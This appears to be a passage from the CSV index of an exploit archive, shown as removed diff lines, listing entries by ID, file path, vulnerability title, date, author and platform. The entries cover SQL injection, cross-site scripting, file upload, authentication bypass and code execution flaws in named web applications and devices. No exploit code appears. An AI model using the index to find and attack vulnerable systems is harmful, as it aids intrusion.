-37643,exploits/php/webapps/37643.txt,"IBM Rational ClearQuest 8.0 - Multiple Vulnerabilities",2012-08-27,anonymous,php,webapps, -37644,exploits/php/webapps/37644.txt,"Jara 1.6 - Multiple SQL Injections / Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps, -37645,exploits/php/webapps/37645.txt,"OrderSys 1.6.4 - Multiple SQL Injections / Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps, -37646,exploits/php/webapps/37646.txt,"Banana Dance - Cross-Site Scripting / SQL Injection",2012-08-22,"Canberk BOLAT",php,webapps, -37648,exploits/php/webapps/37648.txt,"Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps, -37649,exploits/php/webapps/37649.html,"SiNG cms - 'Password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps, -37650,exploits/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' SQL Injection",2012-08-22,kallimero,php,webapps, -37651,exploits/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,php,webapps, -37652,exploits/php/webapps/37652.txt,"KindEditor - 'name' Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps, -37653,exploits/php/webapps/37653.txt,"WordPress Plugin Rich Widget - Arbitrary File Upload",2012-08-22,Crim3R,php,webapps, -37654,exploits/php/webapps/37654.txt,"WordPress Plugin Monsters Editor for WP Super Edit - Arbitrary File Upload",2012-08-22,Crim3R,php,webapps, -37656,exploits/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro - 'page' Local File Inclusion",2012-08-23,"Corrado Liotta",php,webapps, -37659,exploits/php/webapps/37659.txt,"phpVibe < 4.20 - Persistent Cross-Site Scripting",2015-07-20,"Filippos Mastrogiannis",php,webapps, -37662,exploits/multiple/webapps/37662.txt,"AirDroid iOS / Android / Win 3.1.3 - Persistent",2015-07-20,Vulnerability-Lab,multiple,webapps, -37666,exploits/php/webapps/37666.txt,"Joomla! Component Helpdesk Pro < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80 -37672,exploits/php/webapps/37672.txt,"JW Player - 'logo.link' Cross-Site Scripting",2012-08-29,MustLive,php,webapps, -37674,exploits/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro - 'page' Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps, -37675,exploits/php/webapps/37675.txt,"Joomla! Component Komento - 'cid' SQL Injection",2012-08-27,Crim3R,php,webapps, -37676,exploits/asp/webapps/37676.txt,"Power-eCommerce - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps, -37677,exploits/php/webapps/37677.txt,"WordPress Plugin Finder - 'order' Cross-Site Scripting",2012-08-25,Crim3R,php,webapps, -37678,exploits/asp/webapps/37678.txt,"Web Wiz Forums - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps, -37679,exploits/php/webapps/37679.txt,"LibGuides - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,php,webapps, -37680,exploits/php/webapps/37680.txt,"Mihalism Multi Host - 'users.php' Cross-Site Scripting",2012-08-25,Explo!ter,php,webapps, -37681,exploits/php/webapps/37681.txt,"WordPress Plugin Cloudsafe365 - 'file' Remote File Disclosure",2012-08-28,"Jan Van Niekerk",php,webapps, -37682,exploits/php/webapps/37682.txt,"WordPress Plugin Simple:Press Forum - Arbitrary File Upload",2012-08-28,"Iranian Dark Coders",php,webapps, -37683,exploits/php/webapps/37683.txt,"Phorum 5.2.18 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps, -37684,exploits/php/webapps/37684.html,"PrestaShop 1.4.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps, -37686,exploits/multiple/webapps/37686.txt,"Hawkeye-G 3.0.1.4912 - Cross-Site Request Forgery",2015-07-24,hyp3rlinx,multiple,webapps, -37687,exploits/php/webapps/37687.txt,"TomatoCart - 'example_form.ajax.php' Cross-Site Scripting",2012-08-30,HauntIT,php,webapps, -37689,exploits/asp/webapps/37689.txt,"XM Forum - 'search.asp' SQL Injection",2012-08-30,Crim3R,asp,webapps, -37690,exploits/php/webapps/37690.txt,"Crowbar - 'file' Multiple Cross-Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps, -37691,exploits/php/webapps/37691.txt,"SugarCRM Community Edition - Multiple Information Disclosure Vulnerabilities",2012-08-31,"Brendan Coles",php,webapps, -37693,exploits/php/webapps/37693.txt,"Sitemax Maestro - SQL Injection / Local File Inclusion",2012-09-03,AkaStep,php,webapps, -37694,exploits/php/webapps/37694.txt,"Wiki Web Help - 'configpath' Remote File Inclusion",2012-08-04,L0n3ly-H34rT,php,webapps, -37695,exploits/php/webapps/37695.txt,"Sciretech (Multiple Products) - Multiple SQL Injections",2012-09-04,AkaStep,php,webapps, -37696,exploits/asp/webapps/37696.txt,"Cm3 CMS - 'search.asp' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,Crim3R,asp,webapps, -37697,exploits/php/webapps/37697.txt,"PHPFox 3.0.1 - 'ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps, -37698,exploits/php/webapps/37698.txt,"Kayako Fusion - 'download.php' Cross-Site Scripting",2012-09-05,"High-Tech Bridge",php,webapps, -37700,exploits/multiple/webapps/37700.txt,"Hawkeye-G 3.0.1.4912 - Persistent Cross-Site Scripting / Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps, -37826,exploits/php/webapps/37826.txt,"WordPress 3.4.2 - Multiple Path Disclosure Vulnerabilities",2012-09-18,AkaStep,php,webapps, -37751,exploits/php/webapps/37751.txt,"WordPress Plugin WPTF Image Gallery 1.03 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 -37752,exploits/php/webapps/37752.txt,"WordPress Plugin Recent Backups 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 -37705,exploits/php/webapps/37705.txt,"WordPress Plugin Unite Gallery Lite 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80 -37707,exploits/php/webapps/37707.txt,"WordPress Plugin Count Per Day 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80 -37708,exploits/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps, -37709,exploits/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution",2015-07-28,hyp3rlinx,php,webapps, -37712,exploits/php/webapps/37712.txt,"phpFileManager 0.9.8 - Cross-Site Request Forgery",2015-07-29,hyp3rlinx,php,webapps,80 -37713,exploits/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,php,webapps,80 -37714,exploits/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,php,webapps,80 -37715,exploits/php/webapps/37715.txt,"Tendoo CMS 1.3 - Cross-Site Scripting",2015-07-29,"Arash Khazaei",php,webapps,80 -37720,exploits/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps, -37725,exploits/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps, -37726,exploits/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80 -37734,exploits/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,php,webapps,80 -37735,exploits/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution",2015-08-07,LiquidWorm,php,webapps,80 -37753,exploits/php/webapps/37753.txt,"WordPress Plugin Simple Image Manipulator 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 -37738,exploits/php/webapps/37738.txt,"WordPress Plugin Job Manager 0.7.22 - Persistent Cross-Site Scripting",2015-08-07,"Owais Mehtab",php,webapps,80 -37824,exploits/php/webapps/37824.txt,"WordPress Plugin WP Symposium 15.1 - 'get_album_item.php' SQL Injection",2015-08-18,PizzaHatHacker,php,webapps,80 -37744,exploits/php/webapps/37744.txt,"WordPress Plugin Video Gallery 2.7 - SQL Injection",2015-08-09,"Kacper Szurek",php,webapps, -37750,exploits/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80 -37754,exploits/php/webapps/37754.txt,"WordPress Plugin Candidate Application Form 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 -37948,exploits/php/webapps/37948.txt,"WordPress Plugin Slideshow - Multiple Cross-Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps, -37950,exploits/php/webapps/37950.txt,"jCore - '/admin/index.php?path' Cross-Site Scripting",2012-10-17,"High-Tech Bridge",php,webapps, -37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",multiple,webapps, -37761,exploits/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting",2015-08-12,"Taurus Omar",ios,webapps, -37765,exploits/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection",2015-08-13,"Dawid Golunski",multiple,webapps, -37767,exploits/multiple/webapps/37767.txt,"Joomla! Component com_jem 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps, -37769,exploits/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",php,webapps, -37770,exploits/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor / Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps, -37773,exploits/php/webapps/37773.txt,"Joomla! Component com_memorix - SQL Injection",2015-08-15,"BM Cloudx",php,webapps, -37774,exploits/php/webapps/37774.txt,"Joomla! Component com_informations - SQL Injection",2015-08-15,"BM Cloudx",php,webapps, -37778,exploits/hardware/webapps/37778.txt,"Security IP Camera Star Vision DVR - Authentication Bypass",2015-08-15,"Meisam Monsef",hardware,webapps, -37779,exploits/php/webapps/37779.txt,"Flogr - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,"High-Tech Bridge",php,webapps, -37781,exploits/php/webapps/37781.txt,"Extcalendar 2.0 - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",php,webapps, -37782,exploits/php/webapps/37782.txt,"web@all - Local File Inclusion / Multiple Arbitrary File Upload Vulnerabilities",2012-09-06,KedAns-Dz,php,webapps, -37784,exploits/php/webapps/37784.txt,"Pinterestclones - Security Bypass / HTML Injection",2012-09-08,DaOne,php,webapps, -37785,exploits/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injections",2012-09-10,"Sepahan TelCom IT Group",php,webapps, -37786,exploits/php/webapps/37786.txt,"DELTAScripts PHP Links - Multiple SQL Injections",2012-09-10,L0n3ly-H34rT,php,webapps, -37787,exploits/php/webapps/37787.txt,"WordPress Plugin Download Monitor - 'dlsearch' Cross-Site Scripting",2012-08-30,"Chris Cooper",php,webapps, -37789,exploits/php/webapps/37789.txt,"OpenFiler 2.3 - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",php,webapps, -37790,exploits/php/webapps/37790.txt,"FBDj - 'id' SQL Injection",2012-09-11,"TUNISIAN CYBER",php,webapps, -37791,exploits/multiple/webapps/37791.txt,"Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting",2012-09-12,"D. Niedermaier",multiple,webapps, -37940,exploits/php/webapps/37940.txt,"SenseSites CommonSense CMS - 'id' SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps, -37941,exploits/php/webapps/37941.txt,"SenseSites CommonSense CMS - 'special.php?id' SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps, -37942,exploits/php/webapps/37942.txt,"SenseSites CommonSense CMS - 'article.php?id' SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps, -37943,exploits/php/webapps/37943.txt,"WebTitan - 'logs-x.php' Directory Traversal",2012-10-20,"Richard Conner",php,webapps, -37944,exploits/php/webapps/37944.txt,"vBSEO - 'u' Cross-Site Scripting",2012-06-16,MegaMan,php,webapps, -37945,exploits/php/webapps/37945.txt,"Silverstripe CMS 2.4.x - 'BackURL' Open Redirection",2012-10-15,"Aung Khant",php,webapps, -37946,exploits/php/webapps/37946.txt,"WordPress Plugin Crayon Syntax Highlighter - 'wp_load' Remote File Inclusion",2012-10-15,"Charlie Eriksen",php,webapps, -37801,exploits/hardware/webapps/37801.sh,"Sagemcom F@ST 3864 V2 - Get Admin Password",2015-08-17,"Cade Bull",hardware,webapps, -37802,exploits/jsp/webapps/37802.html,"IFOBS - 'regclientprint.jsp' Multiple HTML Injection Vulnerabilities",2012-09-15,MustLive,jsp,webapps, -37804,exploits/php/webapps/37804.txt,"minimal Gallery - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-17,ayastar,php,webapps, -37805,exploits/php/webapps/37805.txt,"TAGWORX.CMS - 'cid' SQL Injection",2012-09-18,Crim3R,php,webapps, -37806,exploits/cgi/webapps/37806.txt,"AxisInternet VoIP Manager - Multiple Cross-Site Scripting Vulnerabilities",2012-09-18,"Benjamin Kunz Mejri",cgi,webapps, -37807,exploits/php/webapps/37807.txt,"vBulletin 4.1.12 - 'blog_plugin_useradmin.php' SQL Injection",2012-09-18,Am!r,php,webapps, -37809,exploits/php/webapps/37809.php,"Nuts CMS - PHP Remote Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80 -37811,exploits/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Authenticated Remote Code Execution",2015-08-18,Ebrietas0,php,webapps,80 -37817,exploits/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - Cross-Site Scripting",2015-08-18,hyp3rlinx,php,webapps,80 -37818,exploits/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - Cross-Site Request Forgery",2015-08-18,hyp3rlinx,php,webapps,80 -37819,exploits/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,hyp3rlinx,php,webapps,80 -37820,exploits/php/webapps/37820.txt,"CodoForum 3.3.1 - Multiple SQL Injections",2015-08-18,"Curesec Research Team",php,webapps,80 -37821,exploits/php/webapps/37821.txt,"BigTree CMS 4.2.3 - Authenticated SQL Injection",2015-08-18,"Curesec Research Team",php,webapps,80 -37822,exploits/php/webapps/37822.txt,"WordPress Plugin WP Symposium 15.1 - Blind SQL Injection",2015-08-18,dxw,php,webapps,80 -37827,exploits/php/webapps/37827.txt,"WordPress Theme Purity - Multiple Cross-Site Scripting Vulnerabilities",2012-09-07,"Matan Azugi",php,webapps, -37828,exploits/php/webapps/37828.txt,"Poweradmin - 'index.php' Cross-Site Scripting",2012-09-20,Siavash,php,webapps, -37829,exploits/php/webapps/37829.txt,"WordPress Plugin MF Gig Calendar - Cross-Site Scripting",2012-09-20,"Chris Cooper",php,webapps, -37830,exploits/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps, -37938,exploits/php/webapps/37938.txt,"OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps, -37939,exploits/php/webapps/37939.txt,"FileContral - Local File Inclusion / Local File Disclosure",2012-08-11,"Ashiyane Digital Security Team",php,webapps, -38066,exploits/php/webapps/38066.txt,"WordPress Plugin Video Lead Form - 'errMsg' Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps, -38067,exploits/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80 -37833,exploits/php/webapps/37833.txt,"YCommerce - Multiple SQL Injections",2012-09-21,"Ricardo Almeida",php,webapps, -37835,exploits/php/webapps/37835.html,"WordPress 3.4.2 - Cross-Site Request Forgery",2012-09-22,AkaStep,php,webapps, -37836,exploits/php/webapps/37836.txt,"WordPress Plugin Token Manager - 'tid' Cross-Site Scripting",2012-09-25,TheCyberNuxbie,php,webapps, -37837,exploits/php/webapps/37837.html,"WordPress Plugin Sexy Add Template - Cross-Site Request Forgery",2012-09-22,the_cyber_nuxbie,php,webapps, -37838,exploits/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'searchFor' Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps, -37885,exploits/php/webapps/37885.html,"up.time 7.5.0 - Superadmin Privilege Escalation",2015-08-19,LiquidWorm,php,webapps,9999 -37886,exploits/php/webapps/37886.txt,"up.time 7.5.0 - Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-19,LiquidWorm,php,webapps,9999 -37887,exploits/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose and Delete",2015-08-19,LiquidWorm,php,webapps,9999 -37888,exploits/php/webapps/37888.txt,"up.time 7.5.0 - Upload and Execute",2015-08-19,LiquidWorm,php,webapps,9999 -37891,exploits/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple Vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343 -37892,exploits/asp/webapps/37892.txt,"Vifi Radio 1.0 - Cross-Site Request Forgery",2015-08-20,KnocKout,asp,webapps,80 -37894,exploits/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80 -37896,exploits/php/webapps/37896.txt,"WordPress Plugin ABC Test - 'id' Cross-Site Scripting",2012-09-26,"Scott Herbert",php,webapps, -37899,exploits/php/webapps/37899.txt,"Switchvox - Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps, -37901,exploits/php/webapps/37901.txt,"AlamFifa CMS - 'user_name_cookie' SQL Injection",2012-09-30,L0n3ly-H34rT,php,webapps, -37902,exploits/php/webapps/37902.php,"WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",php,webapps, -37903,exploits/php/webapps/37903.txt,"ZenPhoto - 'admin-news-articles.php' Cross-Site Scripting",2012-10-02,"Scott Herbert",php,webapps, -37904,exploits/php/webapps/37904.txt,"Omnistar Mailer - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-10-01,"Vulnerability Laboratory",php,webapps, -37906,exploits/php/webapps/37906.txt,"WordPress Plugin Googmonify 0.8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2015-08-21,"Ehsan Hosseini",php,webapps,80 -37907,exploits/php/webapps/37907.txt,"WordPress Plugin MDC Private Message 1.0.0 - Persistent Cross-Site Scripting",2015-08-21,"Chris Kellum",php,webapps,80 -37926,exploits/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps, -37927,exploits/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps, -37928,exploits/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection / Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps, -37929,exploits/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps, -37930,exploits/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",php,webapps, -37931,exploits/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps, -37932,exploits/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",php,webapps, -37933,exploits/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps, -37934,exploits/php/webapps/37934.txt,"WordPress Plugin Shopp - Multiple Vulnerabilities",2012-10-05,T0x!c,php,webapps, -37935,exploits/php/webapps/37935.txt,"Interspire Email Marketer - Cross-Site Scripting / HTML Injection / SQL Injection",2012-10-08,"Ibrahim El-Sayed",php,webapps, -37936,exploits/php/webapps/37936.txt,"Open Realty - 'select_users_lang' Local File Inclusion",2012-10-06,L0n3ly-H34rT,php,webapps, -37955,exploits/php/webapps/37955.html,"Pligg CMS 2.0.2 - Cross-Site Request Forgery (Add Admin)",2015-08-24,"Arash Khazaei",php,webapps,80 -37956,exploits/php/webapps/37956.txt,"WordPress Theme GeoPlaces3 - Arbitrary File Upload",2015-08-24,Mdn_Newbie,php,webapps,80 -37959,exploits/php/webapps/37959.txt,"BSW Gallery - 'uploadpic.php' Arbitrary File Upload",2012-10-18,cr4wl3r,php,webapps, -37960,exploits/php/webapps/37960.txt,"Amateur Photographer's Image Gallery - 'force-download.php?File' Information Disclosure",2012-10-18,cr4wl3r,php,webapps, -37961,exploits/php/webapps/37961.txt,"Amateur Photographer's Image Gallery - 'plist.php?albumid' SQL Injection",2012-10-18,cr4wl3r,php,webapps, -37962,exploits/php/webapps/37962.txt,"Amateur Photographer's Image Gallery - 'plist.php?albumid' Cross-Site Scripting",2012-10-18,cr4wl3r,php,webapps, -37963,exploits/php/webapps/37963.txt,"Amateur Photographer's Image Gallery - 'fullscreen.php?albumid' SQL Injection",2012-10-18,cr4wl3r,php,webapps, -37965,exploits/hardware/webapps/37965.txt,"Keeper IP Camera 3.2.2.10 - Authentication Bypass",2015-08-25,"RAT - ThiefKing",hardware,webapps, -37968,exploits/php/webapps/37968.txt,"CMS Mini 0.2.2 - 'index.php' Script Cross-Site Scripting",2012-10-19,Netsparker,php,webapps, -37970,exploits/php/webapps/37970.html,"WordPress Plugin Wordfence Security - Cross-Site Scripting",2012-10-18,MustLive,php,webapps, -37971,exploits/php/webapps/37971.html,"WHMCompleteSolution (WHMCS) 4.5.2 - 'googlecheckout.php' SQL Injection",2012-10-22,"Starware Security Team",php,webapps, -37973,exploits/php/webapps/37973.txt,"SMF - 'view' Cross-Site Scripting",2012-10-23,Am!r,php,webapps, -37974,exploits/php/webapps/37974.txt,"Inventory - Multiple Cross-Site Scripting / SQL Injections",2012-10-26,G13,php,webapps, -37977,exploits/xml/webapps/37977.py,"Magento eCommerce - Remote Code Execution",2015-08-26,"Manish Tanwar",xml,webapps, -37978,exploits/php/webapps/37978.txt,"Gramophone - 'rs' Cross-Site Scripting",2012-10-25,G13,php,webapps, -37979,exploits/php/webapps/37979.txt,"VicBlog - Multiple SQL Injections",2012-10-26,Geek,php,webapps, -37982,exploits/hardware/webapps/37982.pl,"TP-Link TL-WR841N Router - Local File Inclusion",2012-10-29,"Matan Azugi",hardware,webapps, -37983,exploits/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Bypass",2012-10-26,"Michal Blaszczak",php,webapps, -37989,exploits/php/webapps/37989.txt,"IP.Board 4.x - Persistent Cross-Site Scripting",2015-08-27,snop,php,webapps, -37991,exploits/php/webapps/37991.txt,"WANem - Multiple Cross-Site Scripting Vulnerabilities",2012-10-16,"Brendan Coles",php,webapps, -37992,exploits/php/webapps/37992.txt,"CorePlayer - 'callback' Cross-Site Scripting",2012-10-28,MustLive,php,webapps, -37993,exploits/php/webapps/37993.txt,"Joomla! Component com_quiz - SQL Injection",2012-10-30,"Daniel Barragan",php,webapps, -37994,exploits/php/webapps/37994.txt,"NetCat CMS - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps, -37995,exploits/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager (IPAM) - 'search.aspx' Cross-Site Scripting",2012-10-31,"Anthony Trummer",asp,webapps, -37998,exploits/php/webapps/37998.txt,"WordPress Plugin Responsive Thumbnail Slider 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80 -37999,exploits/java/webapps/37999.txt,"Jenkins 1.626 - Cross-Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps, -38000,exploits/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload / Execution",2015-08-28,"Narendra Bhati",php,webapps,80 -38002,exploits/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80 -38004,exploits/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80 -38006,exploits/php/webapps/38006.txt,"BloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps, -38007,exploits/php/webapps/38007.txt,"DCForum - 'auth_user_file.txt' File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps, -38008,exploits/php/webapps/38008.txt,"Joomla! Component Parcoauto - 'idVeicolo' SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps, -38009,exploits/php/webapps/38009.txt,"AWAuctionScript CMS - Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps, -38010,exploits/php/webapps/38010.txt,"VeriCentre - Multiple SQL Injections",2012-11-06,"Cory Eubanks",php,webapps, -38011,exploits/php/webapps/38011.txt,"OrangeHRM - 'sortField' SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps, -38012,exploits/php/webapps/38012.txt,"WordPress Plugin FLV Player - 'id' SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps, -38015,exploits/php/webapps/38015.txt,"AR Web Content Manager (AWCM) - 'cookie_gen.php' Arbitrary Cookie Generation",2012-11-08,"Sooel Son",php,webapps, -38016,exploits/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' SQL Injection",2012-11-09,anonymous,multiple,webapps, -38017,exploits/php/webapps/38017.txt,"WordPress Theme Kakao - 'ID' SQL Injection",2012-11-09,sil3nt,php,webapps, -38018,exploits/php/webapps/38018.txt,"WordPress Plugin PHP Event Calendar - 'cid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps, -38019,exploits/php/webapps/38019.txt,"WordPress Plugin Eco-annu - 'eid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps, -38022,exploits/php/webapps/38022.txt,"WordPress Theme Dailyedition-mouss - 'id' SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps, -38023,exploits/php/webapps/38023.txt,"WordPress Plugin Tagged Albums - 'id' SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps, -38024,exploits/php/webapps/38024.txt,"WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",php,webapps, -38025,exploits/php/webapps/38025.txt,"Omni-Secure - 'dir' Multiple File Disclosure Vulnerabilities",2012-11-19,HaCkeR_EgY,php,webapps, -38026,exploits/php/webapps/38026.txt,"Friends in War The FAQ Manager - 'question' SQL Injection",2012-11-16,unsuprise,php,webapps, -38027,exploits/php/webapps/38027.txt,"PhpWiki 1.5.4 - Multiple Vulnerabilities",2015-08-31,smash,php,webapps,80 -38029,exploits/hardware/webapps/38029.txt,"Edimax PS-1206MF - Web Admin Authentication Bypass",2015-08-31,smash,hardware,webapps,80 -38030,exploits/php/webapps/38030.php,"Ganglia Web Frontend < 3.5.1 - PHP Code Execution",2015-08-31,"Andrei Costin",php,webapps, -38034,exploits/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps, -38037,exploits/php/webapps/38037.html,"Open-Realty 2.5.8 - Cross-Site Request Forgery",2012-11-16,"Aung Khant",php,webapps, -38039,exploits/php/webapps/38039.txt,"openSIS 5.1 - 'ajax.php' Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps, -38040,exploits/php/webapps/38040.txt,"ATutor 2.1 - 'tool_file' Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps, -38041,exploits/php/webapps/38041.txt,"WordPress Theme Madebymilk - 'id' SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps, -38042,exploits/php/webapps/38042.txt,"dotProject 2.1.x - 'index.php' Multiple SQL Injections",2012-11-21,"High-Tech Bridge",php,webapps, -38043,exploits/php/webapps/38043.txt,"dotProject 2.1.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-11-21,"High-Tech Bridge",php,webapps, -38044,exploits/php/webapps/38044.txt,"Feng Office - Security Bypass / HTML Injection",2012-11-21,Ur0b0r0x,php,webapps, -38045,exploits/php/webapps/38045.html,"XiVO - Cross-Site Request Forgery",2012-11-21,"Francis Provencher",php,webapps, -38046,exploits/php/webapps/38046.txt,"WordPress Plugin Zingiri Web Shop - 'path' Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps, -38047,exploits/php/webapps/38047.txt,"WordPress Plugin Webplayer - 'id' SQL Injection",2012-11-22,"Novin hack",php,webapps, -38048,exploits/php/webapps/38048.txt,"WordPress Plugin Plg Novana - 'id' SQL Injection",2012-11-22,sil3nt,php,webapps, -38050,exploits/php/webapps/38050.txt,"WordPress Plugin Zarzadzonie Kontem - 'ajaxfilemanager.php' Script Arbitrary File Upload",2012-11-22,"Ashiyane Digital 